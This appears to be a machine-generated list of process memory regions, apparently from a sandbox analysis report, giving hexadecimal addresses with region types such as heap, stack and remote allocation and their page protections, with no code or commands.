page execute and read and write
12FC5FE4000
heap
page read and write
9F59000
heap
page read and write
12FE08B0000
trusted library allocation
page read and write
8574000
heap
page read and write
9A75000
stack
page read and write
1A549410000
heap
page read and write
A1DA000
heap
page read and write
6900000
unkown
page read and write
51B9000
unkown
page read and write
FF93000
heap
page read and write
4B6C000
stack
page read and write
3008000
stack
page read and write
86B0000
heap
page read and write
B849000
stack
page read and write
28251770000
trusted library allocation
page read and write
49BB000
heap
page read and write
A0B8000
heap
page read and write
58BE000
heap
page read and write
E39E000
stack
page read and write
D25C000
unkown
page readonly
554000
heap
page read and write
A1DA000
heap
page read and write
7FFA5BD5F000
unkown
page readonly
E21B000
stack
page read and write
4DDADEE000
stack
page read and write
D59D000
heap
page read and write
FF95000
heap
page read and write
A187000
heap
page read and write
A19B000
heap
page read and write
26AC6754000
trusted library allocation
page read and write
282517C0000
trusted library allocation
page read and write
26AC2023000
trusted library allocation
page read and write
2016A06F000
heap
page read and write
10C0F000
stack
page read and write
A0A4000
heap
page read and write
26AC2590000
trusted library allocation
page read and write
A089000
heap
page read and write
26AC6800000
trusted library allocation
page read and write
B80000
heap
page read and write
7FF9F1870000
trusted library allocation
page read and write
A17D000
heap
page read and write
50CE000
stack
page read and write
57E6000
heap
page read and write
819D000
unkown
page read and write
7DF425C40000
unkown
page readonly
5BEC000
unkown
page read and write
7FF51177D000
unkown
page readonly
D233000
unkown
page readonly
FCA000
heap
page read and write
2A93000
heap
page read and write
CA40000
unkown
page readonly
2F4C000
heap
page read and write
671C000
stack
page read and write
4900000
heap
page read and write
9E52000
heap
page read and write
7FFA5B5CF000
unkown
page readonly
1382000
heap
page read and write
7FF5119E1000
unkown
page readonly
B748000
stack
page read and write
7FF511906000
unkown
page readonly
FF0000
remote allocation
page read and write
A1D3000
heap
page read and write
5487000
stack
page read and write
28251090000
trusted library allocation
page read and write
7FF9F15E0000
trusted library allocation
page read and write
5981000
heap
page read and write
DF4A000
heap
page read and write
504C000
stack
page read and write
26AC6870000
trusted library allocation
page read and write
FC7000
heap
page read and write
7FF9F1781000
trusted library allocation
page read and write
2F7B000
heap
page read and write
7FF9F1950000
trusted library allocation
page read and write
9E99000
heap
page read and write
1C7C7450000
trusted library allocation
page read and write
85E4000
heap
page read and write
281890A0000
heap
page execute and read and write
937C000
stack
page read and write
282389E1000
trusted library allocation
page read and write
1C7AD120000
unkown
page read and write
7FF511546000
unkown
page readonly
FDC57FE000
stack
page read and write
281872F4000
heap
page read and write
28187279000
heap
page read and write
9EB7000
heap
page read and write
12FE07A0000
trusted library allocation
page read and write
28251080000
trusted library allocation
page read and write
DB3A000
stack
page read and write
5900000
heap
page read and write
E68000
heap
page read and write
7FF511501000
unkown
page readonly
7FF51155B000
unkown
page readonly
7FF5112C2000
unkown
page readonly
4730000
unkown
page read and write
84AA000
heap
page read and write
156293A0000
heap
page read and write
84C6000
heap
page read and write
92FA000
stack
page read and write
7FF511689000
unkown
page readonly
7FF9F1850000
trusted library allocation
page read and write
1C7C7450000
trusted library allocation
page read and write
590B000
heap
page read and write
7FF5114B9000
unkown
page readonly
12FE0870000
trusted library allocation
page read and write
2F18000
unkown
page read and write
7FFA5B56C000
unkown
page read and write
5350000
unkown
page readonly
815A000
unkown
page read and write
F618000
stack
page read and write
2060C0BA000
heap
page read and write
7DF419790000
trusted library allocation
page readonly
FDC53FF000
stack
page read and write
D58E000
heap
page read and write
7FF51199B000
unkown
page readonly
3E9000
system
page execute and read and write
72C0000
trusted library allocation
page read and write
7CA3000
unkown
page readonly
8B39D7D000
stack
page read and write
E1A9000
unkown
page read and write
79F1000
unkown
page readonly
7FF9F1930000
trusted library allocation
page read and write
FF20000
heap
page read and write
48B0000
unkown
page read and write
9C5000
stack
page read and write
57E2000
heap
page read and write
5C9C000
unkown
page read and write
8171000
unkown
page read and write
473A000
unkown
page read and write
860C000
stack
page read and write
A080000
heap
page read and write
282389E0000
trusted library allocation
page read and write
28238F40000
trusted library allocation
page read and write
29AD000
trusted library allocation
page read and write
E29C000
stack
page read and write
26AC1B18000
heap
page read and write
A059000
heap
page read and write
10A82000
heap
page read and write
D58E000
heap
page read and write
D269000
unkown
page readonly
85E4000
heap
page read and write
CF2E000
unkown
page readonly
7FF51196F000
unkown
page readonly
10F0A000
unkown
page read and write
9ED1000
heap
page read and write
7FF9F1751000
trusted library allocation
page read and write
30DE000
stack
page read and write
7ED6000
unkown
page read and write
7FF9F15E0000
trusted library allocation
page read and write
4990000
unkown
page readonly
108E5000
heap
page read and write
A18A000
heap
page read and write
9F75000
heap
page read and write
A63C000
stack
page read and write
8458000
heap
page read and write
CF9A000
unkown
page readonly
8348000
heap
page read and write
7FF5119B6000
unkown
page readonly
9F77000
heap
page read and write
48E0000
unkown
page read and write
281A1441000
heap
page read and write
E53E000
unkown
page read and write
A1A9000
heap
page read and write
7FF511AB6000
unkown
page readonly
7FF511499000
unkown
page readonly
463E7FF000
stack
page read and write
49C6000
unkown
page read and write
9EB7000
heap
page read and write
910000
heap
page read and write
957D000
stack
page read and write
30FD000
heap
page read and write
FDC5BBE000
stack
page read and write
7FF5118A9000
unkown
page readonly
282518E0000
trusted library allocation
page read and write
85E4000
heap
page read and write
5196000
unkown
page read and write
D1A3000
unkown
page readonly
E20000
unkown
page read and write
D939000
stack
page read and write
5310000
unkown
page read and write
84DF000
heap
page read and write
4E85000
stack
page read and write
A1B9000
heap
page read and write
103FA000
heap
page read and write
27E30315000
trusted library allocation
page read and write
7FFA5BD00000
unkown
page read and write
5440000
unkown
page readonly
D0AC000
unkown
page readonly
1E4A71B8000
heap
page read and write
A1D7000
heap
page read and write
1A10B350000
heap
page read and write
12FE07D0000
trusted library allocation
page read and write
26AC0FC0000
trusted library allocation
page read and write
7FFA5BB60000
unkown
page readonly
281A1F88000
heap
page read and write
EA0000
heap
page read and write
7FF511957000
unkown
page readonly
D59D000
heap
page read and write
A68B000
stack
page read and write
4A95000
heap
page read and write
567B000
stack
page read and write
5CB6000
unkown
page read and write
D59D000
heap
page read and write
2060C1B0000
heap
page read and write
7FF511730000
unkown
page readonly
3119000
heap
page read and write
1A549570000
heap
page read and write
90FD000
stack
page read and write
2E8C000
stack
page read and write
7A35000
unkown
page readonly
7FF9F18C0000
trusted library allocation
page read and write
7FF9F1799000
trusted library allocation
page read and write
3480000
unkown
page readonly
2F7B000
heap
page read and write
5440000
unkown
page readonly
12FE0860000
trusted library allocation
page read and write
585A000
heap
page read and write
7FF51173D000
unkown
page readonly
815C000
unkown
page read and write
28251860000
trusted library allocation
page read and write
7FF511855000
unkown
page readonly
582C000
heap
page read and write
57E3000
heap
page read and write
281A202E000
heap
page read and write
5280000
unkown
page readonly
6720000
trusted library allocation
page read and write
5978000
heap
page read and write
E70000
trusted library allocation
page read and write
12FE0190000
trusted library allocation
page read and write
46F0000
unkown
page read and write
2DC0000
stack
page read and write
3650000
heap
page read and write
7FF9F166C000
trusted library allocation
page execute and read and write
2820000
unkown
page readonly
9F6F000
heap
page read and write
5389000
stack
page read and write
2F80000
heap
page read and write
7CCC000
unkown
page readonly
7FF9F1890000
trusted library allocation
page read and write
2F7D000
heap
page read and write
306F000
stack
page read and write
12FC7B50000
trusted library allocation
page read and write
58FE000
heap
page read and write
69B3000
unkown
page read and write
59AF000
heap
page read and write
816F000
unkown
page read and write
E10E000
unkown
page read and write
85D3000
heap
page read and write
4D50000
unkown
page readonly
4DDB4FF000
stack
page read and write
540E000
stack
page read and write
8517000
heap
page read and write
1A563453000
heap
page read and write
5BEC000
unkown
page read and write
31D0000
heap
page read and write
554000
heap
page read and write
5F21000
heap
page read and write
7FF5114FE000
unkown
page readonly
4FC0000
trusted library allocation
page read and write
5BA4000
unkown
page read and write
20169DC0000
heap
page read and write
7FF5119E1000
unkown
page readonly
A19B000
heap
page read and write
DF4A000
heap
page read and write
7FFA5950A000
unkown
page readonly
7FF9F17A0000
trusted library allocation
page read and write
A11A000
heap
page read and write
58BB000
heap
page read and write
D1C2000
unkown
page readonly
485F000
trusted library allocation
page execute and read and write
910000
heap
page read and write
E30D000
stack
page read and write
6680000
unkown
page read and write
86A8000
heap
page read and write
9EB3000
heap
page read and write
31D2000
heap
page read and write
1494000
heap
page read and write
7FFA5BC49000
unkown
page readonly
7FF511464000
unkown
page readonly
28189556000
trusted library allocation
page read and write
7DF425C31000
unkown
page execute read
7FF5119C4000
unkown
page readonly
119DC000
stack
page read and write
E8A0000
unkown
page read and write
7490000
heap
page readonly
1A10D542000
heap
page read and write
81AB000
unkown
page read and write
2F7B000
heap
page read and write
538A000
stack
page read and write
CF32000
unkown
page readonly
4740000
unkown
page read and write
7ED6000
unkown
page read and write
A091000
heap
page read and write
EA0E000
stack
page read and write
7FF9F1660000
trusted library allocation
page execute and read and write
D190000
unkown
page readonly
DF47000
heap
page read and write
77ED000
stack
page read and write
2825126E000
heap
page read and write
7340000
trusted library allocation
page read and write
FF55000
heap
page read and write
CF18000
unkown
page readonly
2EC9000
heap
page read and write
5902000
heap
page read and write
5AB0000
heap
page read and write
8574000
heap
page read and write
7FF5119AC000
unkown
page readonly
7FF51164B000
unkown
page readonly
4D10000
unkown
page readonly
4AFC000
stack
page read and write
F618000
stack
page read and write
2825182F000
trusted library allocation
page read and write
590B000
heap
page read and write
20626230000
trusted library allocation
page read and write
28238F40000
trusted library allocation
page read and write
103A7000
heap
page read and write
5B80000
unkown
page read and write
5800000
heap
page read and write
6997000
unkown
page read and write
B349000
stack
page read and write
27E30702000
heap
page read and write
18D55230000
trusted library allocation
page read and write
7FF511590000
unkown
page readonly
3470000
unkown
page read and write
281A1FDA000
heap
page read and write
2060C0A6000
heap
page read and write
7FFA5BD03000
unkown
page readonly
DB3A000
stack
page read and write
12FC5FBA000
heap
page read and write
7FF7000
unkown
page read and write
1C7AFF1C000
trusted library allocation
page read and write
7FF5114A7000
unkown
page readonly
103F6000
heap
page read and write
FF95000
heap
page read and write
31D7000
heap
page read and write
282392C5000
trusted library allocation
page read and write
7FF9F1910000
trusted library allocation
page read and write
A0B1000
heap
page read and write
852A000
heap
page read and write
F04000
heap
page read and write
A0D2000
heap
page read and write
FF1A000
stack
page read and write
10A80000
heap
page read and write
7A69000
stack
page read and write
A1CA000
heap
page read and write
4750000
unkown
page read and write
DB0000
heap
page read and write
85DB000
heap
page read and write
83DA000
heap
page read and write
DB3A000
stack
page read and write
7FF511320000
unkown
page readonly
1203000
heap
page read and write
D0FE000
unkown
page readonly
2F15000
heap
page read and write
118DE000
stack
page read and write
E10B000
unkown
page read and write
103DC000
heap
page read and write
31D2000
heap
page read and write
5F3C000
heap
page read and write
5E48000
stack
page read and write
DF4A000
heap
page read and write
4A95000
heap
page read and write
590B000
heap
page read and write
C739000
stack
page read and write
7FFA5B563000
unkown
page read and write
A1EA000
heap
page read and write
12FC5FE2000
heap
page read and write
2060C09A000
heap
page read and write
E31A000
stack
page read and write
8331000
heap
page read and write
1E4A94BC000
heap
page read and write
8575000
heap
page read and write
7FF511730000
unkown
page readonly
DA80000
unkown
page read and write
A10000
heap
page read and write
27E30202000
unkown
page read and write
7FF9F15E3000
trusted library allocation
page read and write
FDC587E000
stack
page read and write
346A000
stack
page read and write
281A1F30000
heap
page read and write
18D552E0000
trusted library allocation
page read and write
7FF9F1690000
trusted library allocation
page execute and read and write
7FF5118D4000
unkown
page readonly
7FF51166F000
unkown
page readonly
1138E000
stack
page read and write
E20000
unkown
page read and write
F30000
unkown
page read and write
8044000
unkown
page read and write
9EB9000
heap
page read and write
6170000
heap
page read and write
ADD0000
unkown
page read and write
7FF51192A000
unkown
page readonly
4700000
unkown
page read and write
2F7D000
heap
page read and write
7FF9F1820000
trusted library allocation
page read and write
28251870000
trusted library allocation
page read and write
28236F8F000
heap
page read and write
8B39CFE000
stack
page read and write
18D5432E000
heap
page read and write
7FF5115EA000
unkown
page readonly
7FF9F17B2000
trusted library allocation
page read and write
850A000
stack
page read and write
85DB000
heap
page read and write
7FF5118E8000
unkown
page readonly
2E0A000
stack
page read and write
A27F000
stack
page read and write
7D5C000
unkown
page readonly
7FFA5BCFD000
unkown
page write copy
7FF9F1880000
trusted library allocation
page read and write
FF0000
remote allocation
page read and write
1A54B8BE000
trusted library allocation
page read and write
2C10000
unkown
page readonly
5992000
heap
page read and write
D0F3000
unkown
page readonly
9EC4000
heap
page read and write
9F59000
heap
page read and write
7FF9F1820000
trusted library allocation
page read and write
88BB000
stack
page read and write
5905000
heap
page read and write
7FF51188A000
unkown
page readonly
BF0000
unkown
page readonly
FFDF000
heap
page read and write
20625FC0000
heap
page read and write
859E000
heap
page read and write
85F0000
heap
page read and write
12FC7B50000
trusted library allocation
page read and write
4AB9000
heap
page read and write
DF5A000
heap
page read and write
7FF9F15D0000
trusted library allocation
page read and write
C7B8000
stack
page read and write
51BC000
unkown
page read and write
7FF9F1809000
trusted library allocation
page read and write
A03C000
heap
page read and write
1391000
heap
page read and write
5CB6000
unkown
page read and write
84A9000
heap
page read and write
7FF5118EF000
unkown
page readonly
7FF9F1910000
trusted library allocation
page read and write
9E89000
heap
page read and write
4A7A000
stack
page read and write
44F000
heap
page read and write
86A1000
heap
page read and write
2EE9000
heap
page read and write
7FFA5BD03000
unkown
page readonly
7FF51128D000
unkown
page readonly
31BA000
heap
page read and write
7FF511750000
unkown
page readonly
28251060000
trusted library allocation
page read and write
8342000
heap
page read and write
D11C000
unkown
page readonly
26AC0F90000
heap
page read and write
5C47000
stack
page read and write
57F9000
heap
page read and write
12FE0900000
trusted library allocation
page read and write
2F5D000
unkown
page read and write
B7C9000
stack
page read and write
94FD000
stack
page read and write
28236F10000
heap
page read and write
23395024000
heap
page read and write
7EFB000
unkown
page read and write
28236E40000
remote allocation
page read and write
154FBFE000
stack
page read and write
997B000
stack
page read and write
26AC2020000
trusted library allocation
page read and write
28237280000
trusted library allocation
page read and write
4720000
trusted library section
page read and write
85BE000
heap
page read and write
1562947C000
heap
page read and write
5863000
heap
page read and write
103A5000
heap
page read and write
589C000
heap
page read and write
4F0C000
stack
page read and write
9E9F000
heap
page read and write
84EB000
heap
page read and write
12FE03C0000
heap
page read and write
DE7000
heap
page read and write
28236E40000
remote allocation
page read and write
7FF5116F0000
unkown
page readonly
20169E30000
heap
page read and write
2F3D000
heap
page read and write
7FF511930000
unkown
page readonly
281A2024000
heap
page read and write
1C7C7460000
trusted library allocation
page read and write
60F8000
heap
page read and write
28238F00000
trusted library allocation
page read and write
7FF9F17D0000
trusted library allocation
page read and write
3030000
unkown
page read and write
49A2000
heap
page read and write
1C7C7450000
trusted library allocation
page read and write
A1DA000
heap
page read and write
28236E70000
heap
page read and write
E30000
heap
page read and write
5816000
heap
page read and write
E540000
unkown
page read and write
2840000
heap
page read and write
9F6D000
heap
page read and write
E333000
unkown
page read and write
4FE4000
heap
page read and write
A0B8000
heap
page read and write
D113000
unkown
page readonly
2D8E000
stack
page read and write
10A80000
heap
page read and write
2EE0000
unclassified section
page execute and read and write
FC7000
heap
page read and write
AF4B000
stack
page read and write
8571000
heap
page read and write
58B3000
heap
page read and write
28238A30000
heap
page read and write
58FF000
heap
page read and write
7FF51199B000
unkown
page readonly
FDC5C7E000
stack
page read and write
CE97000
unkown
page readonly
7DF45EE30000
trusted library allocation
page readonly
A30000
heap
page read and write
832D000
heap
page read and write
85F2000
heap
page read and write
119DC000
stack
page read and write
9F6F000
heap
page read and write
DB3A000
stack
page read and write
E8A000
heap
page read and write
9EE5000
heap
page read and write
DF4A000
heap
page read and write
837E000
heap
page read and write
400000
remote allocation
page execute and read and write
5BF9000
unkown
page read and write
5AF6000
stack
page read and write
D1CC000
unkown
page readonly
D199000
unkown
page readonly
354A000
stack
page read and write
12FE0850000
trusted library allocation
page read and write
1A10D472000
heap
page read and write
D59D000
heap
page read and write
28251080000
trusted library allocation
page read and write
7FF511598000
unkown
page readonly
60DF000
heap
page read and write
18D55270000
heap
page readonly
12FE0191000
trusted library allocation
page read and write
7FF51166A000
unkown
page readonly
7FF5112DA000
unkown
page readonly
7FF9F178D000
trusted library allocation
page read and write
A083000
heap
page read and write
7FF5119A1000
unkown
page readonly
1A563376000
heap
page read and write
2060DE44000
heap
page read and write
57EB000
heap
page read and write
206260C0000
trusted library allocation
page read and write
7FF9F1830000
trusted library allocation
page read and write
281A1FBF000
heap
page read and write
D63E000
stack
page read and write
4F08000
stack
page read and write
FF91000
heap
page read and write
4B6C000
stack
page read and write
D939000
stack
page read and write
A0AB000
heap
page read and write
7FFA5BD1A000
unkown
page readonly
58CA000
heap
page read and write
60F0000
heap
page read and write
C9BA000
stack
page read and write
957D000
stack
page read and write
108D0000
heap
page read and write
E21B000
stack
page read and write
1A549495000
heap
page read and write
5982000
heap
page read and write
D0D5000
unkown
page readonly
A53D000
stack
page read and write
18D552E0000
trusted library allocation
page read and write
48A1000
unkown
page read and write
7FF51192A000
unkown
page readonly
BE0000
unkown
page read and write
7FF511486000
unkown
page readonly
3050000
unkown
page read and write
6670000
trusted library allocation
page read and write
28189707000
trusted library allocation
page read and write
A63B000
stack
page read and write
8173000
unkown
page read and write
A141000
heap
page read and write
E68000
heap
page read and write
77ED000
stack
page read and write
57E6000
heap
page read and write
6BFE000
stack
page read and write
7FFA594F3000
unkown
page readonly
85E4000
heap
page read and write
C7B8000
stack
page read and write
7FF5119EE000
unkown
page readonly
31C5000
heap
page read and write
1040000
unkown
page read and write
7EC0000
unkown
page read and write
7FF9F1686000
trusted library allocation
page read and write
2D61000
heap
page read and write
4730000
trusted library section
page read and write
E0D0000
unkown
page read and write
7FF511A21000
unkown
page readonly
103F1000
heap
page read and write
813C000
unkown
page read and write
1C7AD100000
unkown
page readonly
86A8000
heap
page read and write
C739000
stack
page read and write
5981000
heap
page read and write
E83F000
unkown
page read and write
2F76000
unkown
page read and write
1380000
heap
page read and write
48C0000
unkown
page read and write
FDC5A78000
stack
page read and write
437237E000
stack
page read and write
5900000
heap
page read and write
1030000
unkown
page readonly
5120000
unkown
page read and write
7FF5117CF000
unkown
page readonly
9E9F000
heap
page read and write
4A54000
heap
page read and write
609A000
heap
page read and write
206260C0000
trusted library allocation
page read and write
A094000
heap
page read and write
1A10B020000
heap
page read and write
A1D3000
heap
page read and write
12FE01A0000
trusted library allocation
page read and write
2F2E000
heap
page read and write
E20B000
stack
page read and write
3480000
unkown
page readonly
20626230000
trusted library allocation
page read and write
2F03000
heap
page read and write
27E30500000
trusted library allocation
page read and write
8517000
heap
page read and write
2D26000
stack
page read and write
85A6000
heap
page read and write
7FF511643000
unkown
page readonly
26D1BFE000
stack
page read and write
27E30500000
trusted library allocation
page read and write
2818732C000
heap
page read and write
7FF51166F000
unkown
page readonly
9F34000
heap
page read and write
100CD000
stack
page read and write
7FF9F1920000
trusted library allocation
page read and write
DF8A000
heap
page read and write
A15D000
heap
page read and write
23395100000
heap
page read and write
A060000
heap
page read and write
BD0000
unkown
page readonly
26AC6A5E000
heap
page read and write
FB8F000
stack
page read and write
281A1FE8000
heap
page read and write
69BD000
unkown
page read and write
7FF511537000
unkown
page readonly
7EC0000
unkown
page read and write
7FF5114F0000
unkown
page readonly
60F0000
heap
page read and write
26AC69C0000
trusted library allocation
page read and write
8574000
heap
page read and write
9EB0000
heap
page read and write
28236EA0000
heap
page read and write
A0D6000
heap
page read and write
5852000
heap
page read and write
463EC39000
stack
page read and write
18D54335000
heap
page read and write
8538000
heap
page read and write
12FE0190000
trusted library allocation
page read and write
C80A000
stack
page read and write
8B3A03E000
stack
page read and write
7FF5119AC000
unkown
page readonly
E31A000
stack
page read and write
490A000
heap
page read and write
334F000
trusted library allocation
page execute and read and write
2EC9000
heap
page read and write
58B3000
heap
page read and write
7DF419790000
trusted library allocation
page readonly
7BFE000
unkown
page readonly
85AD000
heap
page read and write
82F2000
heap
page read and write
60F0000
heap
page read and write
AC40000
unkown
page read and write
7FF9F18A0000
trusted library allocation
page read and write
1C7AD1C2000
heap
page read and write
103D9000
heap
page read and write
58A7000
heap
page read and write
282517E0000
trusted library allocation
page read and write
28251255000
heap
page read and write
1A10D0A1000
heap
page read and write
69A6000
unkown
page read and write
7FF5117F7000
unkown
page readonly
108D0000
heap
page read and write
312E000
heap
page read and write
D0AC000
unkown
page readonly
E8A5000
unkown
page read and write
AB38000
stack
page read and write
51BC000
unkown
page read and write
7A5F000
unkown
page readonly
9F6F000
heap
page read and write
723F9FE000
stack
page read and write
7DF425C71000
unkown
page execute read
7FF5112C1000
unkown
page readonly
7FF511968000
unkown
page readonly
D00000
remote allocation
page read and write
2F42000
unkown
page read and write
281895C6000
trusted library allocation
page read and write
7D55000
unkown
page readonly
E409000
stack
page read and write
5B90000
unkown
page read and write
12FC8416000
trusted library allocation
page read and write
7FF9F18B0000
trusted library allocation
page read and write
8631000
heap
page read and write
D025000
unkown
page readonly
12FE07C0000
trusted library allocation
page read and write
8618000
heap
page read and write
99FC000
stack
page read and write
2060D9D0000
heap
page readonly
7DF403DC0000
trusted library allocation
page execute and read and write
A0C7000
heap
page read and write
8629000
heap
page read and write
9E9D000
heap
page read and write
7FF51167C000
unkown
page readonly
85F8000
heap
page read and write
7DF45EE41000
trusted library allocation
page execute read
1E4A924A000
heap
page read and write
D939000
stack
page read and write
7FF9F16D0000
trusted library allocation
page execute and read and write
7FF511327000
unkown
page readonly
28251810000
trusted library allocation
page read and write
7310000
trusted library allocation
page read and write
7FF9F17F0000
trusted library allocation
page read and write
85CD000
heap
page read and write
D269000
unkown
page readonly
DE60000
trusted library allocation
page read and write
7FF51164B000
unkown
page readonly
A0A6000
heap
page read and write
1494000
heap
page read and write
D18E000
unkown
page readonly
28251080000
trusted library allocation
page read and write
8322000
heap
page read and write
154FB7E000
stack
page read and write
7FF9F1900000
trusted library allocation
page read and write
28251840000
trusted library allocation
page read and write
1A56343F000
heap
page read and write
4997000
heap
page read and write
1C7C7420000
trusted library allocation
page read and write
26AC65A0000
trusted library allocation
page read and write
4F0C000
stack
page read and write
84CE000
heap
page read and write
7FFA5B58A000
unkown
page readonly
5BB2000
unkown
page read and write
2818734C000
heap
page read and write
9CFB000
stack
page read and write
85F2000
heap
page read and write
8602000
heap
page read and write
7FFA5BCF5000
unkown
page read and write
5EB0000
trusted library section
page readonly
A166000
heap
page read and write
6A6F000
stack
page read and write
6999000
unkown
page read and write
2060DF71000
trusted library allocation
page read and write
CA83000
unkown
page readonly
A088000
heap
page read and write
26D20FF000
stack
page read and write
E180000
unkown
page read and write
28237290000
heap
page read and write
31BA000
heap
page read and write
1E4A8BB0000
heap
page read and write
1C7AEBCA000
heap
page read and write
282517C0000
trusted library allocation
page read and write
3470000
unkown
page read and write
4F0C000
stack
page read and write
9F73000
heap
page read and write
60F8000
heap
page read and write
FFDF000
heap
page read and write
454000
heap
page read and write
5981000
heap
page read and write
E68000
heap
page read and write
4E00000
trusted library allocation
page read and write
138B000
heap
page read and write
9EA8000
heap
page read and write
7460000
heap
page read and write
E808000
stack
page read and write
10C0F000
stack
page read and write
3A46000
heap
page read and write
9E7F000
heap
page read and write
28236F18000
heap
page read and write
A0A7000
heap
page read and write
10A82000
heap
page read and write
7FF5114FE000
unkown
page readonly
1C7AF0D1000
trusted library allocation
page read and write
FFD3000
heap
page read and write
4710000
trusted library allocation
page read and write
4947000
heap
page read and write
1C7C72F8000
heap
page read and write
281A1FBF000
heap
page read and write
7FF9F168C000
trusted library allocation
page execute and read and write
590B000
heap
page read and write
CF24000
unkown
page readonly
4DDB3FF000
stack
page read and write
4F8B2FE000
stack
page read and write
E894000
unkown
page read and write
7FF9F17E0000
trusted library allocation
page read and write
7540000
unkown
page readonly
7FF5051D1000
unkown
page readonly
E60C000
stack
page read and write
7FF9F1890000
trusted library allocation
page read and write
2060DA64000
trusted library allocation
page read and write
1010000
unkown
page read and write
1E4A9632000
heap
page read and write
9EE5000
heap
page read and write
9F0000
trusted library allocation
page read and write
9F59000
heap
page read and write
EE14000
unkown
page read and write
472A000
unkown
page read and write
26D1E7E000
stack
page read and write
7FFA5BC49000
unkown
page readonly
D1A3000
unkown
page readonly
7AE2000
unkown
page readonly
30E0000
heap
page read and write
7FF9F1840000
trusted library allocation
page read and write
D4B0000
trusted library allocation
page read and write
26AC6AD8000
heap
page read and write
59AA000
heap
page read and write
281A202C000
heap
page read and write
103A5000
heap
page read and write
7FF511A36000
unkown
page readonly
33A0000
unkown
page readonly
32B0000
unkown
page readonly
108E5000
heap
page read and write
AC3B000
stack
page read and write
281A1F96000
heap
page read and write
751D000
stack
page read and write
5400000
unkown
page read and write
85AB000
heap
page read and write
6720000
trusted library allocation
page read and write
A1CD000
heap
page read and write
7FF5114EC000
unkown
page readonly
2016A000000
heap
page read and write
CE77000
unkown
page readonly
103C1000
heap
page read and write
2910000
unclassified section
page execute and read and write
1A10D08F000
heap
page read and write
6097000
heap
page read and write
1A10B0D5000
heap
page read and write
26AC6980000
trusted library allocation
page read and write
7FFA5B3D1000
unkown
page execute read
7FF511A11000
unkown
page readonly
2016A06E000
heap
page read and write
9FE8000
heap
page read and write
48E0000
trusted library section
page read and write
9F3B000
heap
page read and write
7FFA59439000
unkown
page readonly
2EB0000
unkown
page read and write
7A35000
unkown
page readonly
494B000
heap
page read and write
8454000
heap
page read and write
8B39EFE000
stack
page read and write
A48A000
stack
page read and write
7D1E000
unkown
page readonly
7DF4197A1000
trusted library allocation
page execute read
D40E000
system
page execute and read and write
12FC5F40000
heap
page read and write
31D2000
heap
page read and write
7FF511912000
unkown
page readonly
28237270000
heap
page readonly
4880000
unkown
page read and write
51B9000
unkown
page read and write
586C000
heap
page read and write
5975000
heap
page read and write
12FE0215000
heap
page read and write
7DF47A0C0000
trusted library allocation
page execute and read and write
85E4000
heap
page read and write
7EC2000
unkown
page read and write
7FF9F18D0000
trusted library allocation
page read and write
D59D000
heap
page read and write
599A000
heap
page read and write
E59C000
stack
page read and write
60F0000
heap
page read and write
7FF511496000
unkown
page readonly
7FFA5BD03000
unkown
page readonly
1C7AEBC0000
heap
page read and write
4890000
unkown
page read and write
20626210000
trusted library allocation
page read and write
463EABE000
stack
page read and write
1A54957E000
heap
page read and write
308A000
stack
page read and write
7FF51162A000
unkown
page readonly
33D5000
stack
page read and write
AC40000
unkown
page read and write
28238F10000
trusted library allocation
page read and write
28251080000
trusted library allocation
page read and write
5852000
heap
page read and write
C8B6000
stack
page read and write
4900000
heap
page read and write
5F96000
heap
page read and write
103A9000
heap
page read and write
28189090000
trusted library allocation
page read and write
C9BB000
unkown
page readonly
FF89000
heap
page read and write
7FF9F18A0000
trusted library allocation
page read and write
7FF9F17D9000
trusted library allocation
page read and write
28250FD2000
heap
page read and write
2818973A000
trusted library allocation
page read and write
7FF5118B4000
unkown
page readonly
2F82000
heap
page read and write
D3BA000
stack
page read and write
A41000
heap
page read and write
7FF5112BD000
unkown
page readonly
870A000
stack
page read and write
1A563840000
trusted library allocation
page read and write
103CC000
heap
page read and write
DF40000
heap
page read and write
7FF9F18F0000
trusted library allocation
page read and write
E532000
unkown
page read and write
5CC6000
stack
page read and write
8333000
heap
page read and write
C83F000
stack
page read and write
5FCC000
stack
page read and write
58CA000
heap
page read and write
281896FC000
trusted library allocation
page read and write
D59D000
heap
page read and write
B6CE000
stack
page read and write
1128B000
stack
page read and write
282517F0000
trusted library allocation
page read and write
7ED6000
unkown
page read and write
103CA000
heap
page read and write
9EC4000
heap
page read and write
B748000
stack
page read and write
A1CA000
heap
page read and write
7FF9F1820000
trusted library allocation
page read and write
7FFA5B5CF000
unkown
page readonly
E38000
heap
page read and write
90FD000
stack
page read and write
1A54B2A8000
trusted library allocation
page read and write
9F06000
heap
page read and write
281A1410000
trusted library allocation
page read and write
987B000
stack
page read and write
E20000
unkown
page read and write
499E000
heap
page read and write
4900000
heap
page read and write
7A18000
unkown
page readonly
2060DA61000
trusted library allocation
page read and write
7FF9F1860000
trusted library allocation
page read and write
4900000
trusted library section
page read and write
D255000
unkown
page readonly
E80000
heap
page read and write
49E5000
heap
page read and write
103A6000
heap
page read and write
7DF527E20000
unkown
page readonly
699B000
unkown
page read and write
7FFA59557000
unkown
page readonly
26AC1107000
heap
page read and write
7FFA5BD5F000
unkown
page readonly
5389000
stack
page read and write
60ED000
heap
page read and write
7470000
trusted library allocation
page read and write
DF77000
heap
page read and write
A1A9000
heap
page read and write
CF35000
unkown
page readonly
7D49000
unkown
page readonly
60F0000
heap
page read and write
7FF511A4D000
unkown
page readonly
A17D000
heap
page read and write
D550000
heap
page read and write
7FF9F17C0000
trusted library allocation
page execute and read and write
7FF9F1781000
trusted library allocation
page read and write
320A000
stack
page read and write
7FF9F1900000
trusted library allocation
page read and write
27E30228000
heap
page read and write
9EB7000
heap
page read and write
1A54B89C000
trusted library allocation
page read and write
7D69000
unkown
page readonly
8173000
unkown
page read and write
90FD000
stack
page read and write
E347000
unkown
page read and write
7FF51162A000
unkown
page readonly
1A56344F000
heap
page read and write
3132000
heap
page read and write
2824916B000
trusted library allocation
page read and write
C90B000
stack
page read and write
E49A000
stack
page read and write
A060000
heap
page read and write
A022000
heap
page read and write
88BB000
stack
page read and write
3460000
heap
page read and write
F04A000
unkown
page execute and read and write
A06B000
heap
page read and write
32F0000
unkown
page readonly
49A0000
unkown
page read and write
7FF51187B000
unkown
page readonly
282517B0000
trusted library allocation
page read and write
A02A000
heap
page read and write
A187000
heap
page read and write
2EC9000
heap
page read and write
5F7B000
heap
page read and write
1C7C7271000
heap
page read and write
69C5000
unkown
page read and write
12FE0890000
trusted library allocation
page read and write
10E0F000
stack
page read and write
31D2000
heap
page read and write
719A000
heap
page read and write
9FB7000
heap
page read and write
A149000
heap
page read and write
2339505A000
heap
page read and write
463EDBE000
stack
page read and write
18D542B5000
heap
page read and write
282388B0000
trusted library allocation
page read and write
837A000
heap
page read and write
8574000
